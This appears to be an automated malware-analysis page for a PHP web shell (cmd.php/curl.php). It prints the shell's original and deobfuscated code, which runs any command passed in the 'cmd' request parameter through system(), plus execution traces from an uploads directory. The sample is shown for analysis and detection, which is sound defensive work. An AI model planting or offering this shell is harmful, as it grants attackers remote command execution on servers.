cmd.php, curl.php

md5: 4ca89cefa4d0a69dad7df756b7045f22

Jump to:

Deobfuscated code (Read more)
Execution traces (Read more)
Generated HTML (Read more)
Original Code (Read more)

Screenshot
Attributes
Execution
system (Deobfuscated, Original)

Deobfuscated PHP code
<?php

if (isset($_REQUEST['cmd'])) {
    echo "<pre>";
    $cmd = $_REQUEST['cmd'];
    system($cmd);
    echo "</pre>";
    die;
}
Execution traces
data/traces/4ca89cefa4d0a69dad7df756b7045f22_trace-1676246490.0534.xt
Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-12 22:01:55.951265]
1	0	1	0.000143	393512
1	3	0	0.000193	394592	{main}	1		/var/www/html/uploads/curl.php	0	0
1	3	1	0.000210	394592
			0.000234	314224
TRACE END   [2023-02-12 22:01:55.951385]

data/traces/4ca89cefa4d0a69dad7df756b7045f22_trace-1676257644.4797.xt
Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-13 01:07:50.377472]
1	0	1	0.000140	393512
1	3	0	0.000193	394592	{main}	1		/var/www/html/uploads/cmd.php	0	0
1	3	1	0.000211	394592
			0.000235	314224
TRACE END   [2023-02-13 01:07:50.377597]

Generated HTML code
<html><head></head><body></body></html>
Original PHP code
<?php

if(isset($_REQUEST['cmd'])){
        echo "<pre>";
        $cmd = ($_REQUEST['cmd']);
        system($cmd);
        echo "</pre>";
        die;
}

?>

PHP Malware Analysis

cmd.php, curl.php

md5: 4ca89cefa4d0a69dad7df756b7045f22

Screenshot

Attributes

Deobfuscated PHP code

Execution traces

Generated HTML code

Original PHP code